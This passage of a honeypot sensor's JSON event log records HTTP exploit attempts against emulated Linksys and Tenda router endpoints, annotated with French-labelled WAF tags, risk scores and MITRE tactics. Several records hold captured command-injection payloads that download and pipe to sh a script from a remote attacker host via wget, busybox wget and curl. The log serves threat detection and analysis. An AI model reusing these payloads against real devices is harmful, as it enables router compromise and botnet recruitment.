6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_setup\u0022, \u0022http_sensitive_path\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_setup\u0022, \u0022http_sensitive_path\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":278},{"id":11860756,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59802,"dst_port":81,"service":"http","classification":"http_smuggling_probe","waf_score":52,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/JNAP\/","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00221590bac5c7d7e8540ab87881f47e89fa381ce665\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 409, \u0022payload_entropy\u0022: 5.332522865315399, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 79, \u0022tag_count\u0022: 12, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00220d20bbb5c524d5e553c8e4bd058827f5c03f4658\u0022, \u0022event_fingerprint\u0022: \u002295f10306677b4c8a86d0a637725f6b67be418db1\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022confidence\u0022: 0.95, \u0022classification_confidence\u0022: 0.95, \u0022precision_score\u0022: 84, \u0022precision_signals\u0022: [\u0022pat-0842\u0022], \u0022kb_rule_ids\u0022: [\u0022pat-0842\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 79}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 95.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002227fe4820f0dd5275ffb70a48aa30f04a\u0022, \u0022path_pattern_hash\u0022: \u002209d793525e81db3cecc4e36c738b6310\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 79}, \u0022payload_preview\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jn\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jnap\/wpsstationinfo\/GetStationInfo\\r\\nContent-Length: 205\\r\\nConnection: close\\r\\n\\r\\ndevice_name=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/w\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jn\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jnap\/wpsstationinfo\/GetStationInfo\\r\\nContent-Length: 205\\r\\nConnection: close\\r\\n\\r\\ndevice_name=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/w\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jn\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022web_injection\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00228cf29cef86f7d24c846677e08fbe29e83591d30a\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jn\u0022, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 8 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 79\/100 (\u00c9lev\u00e9) \u2014 MITRE TA0001 \u2014 confiance 95 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 95, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 79}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 79, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022pat-0842\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022pat-0842\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jn\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 8 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 95 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":409},{"id":11860757,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59814,"dst_port":81,"service":"http","classification":"config_file_probe","waf_score":47,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: \u0022js\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00222919e85805df844f358bfd44a8cd7d77ed0a470b\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 291, \u0022payload_entropy\u0022: 5.195346039377604, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 12, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u00222e1a1565e685c137f491f19e3125d135a1340cf1\u0022, \u0022event_fingerprint\u0022: \u0022a347f44c2ed397e4a8db73d049034b0935a6f7c3\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00226cebb999145248d35aa230e5f745ffd6\u0022, \u0022path_pattern_hash\u0022: \u002295596bbb7d1e66e7933797f3db9d43de\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022query_string\u0022: \u0022deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wge\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022query_string\u0022: \u0022deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda HTTP\/1.1\\r\\nHost: 6\u0022, \u0022payload_snippet\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wge\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00227659d3679a0970fddda262fd4b3efab8a5b5e66b\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022request_line\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wge\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde 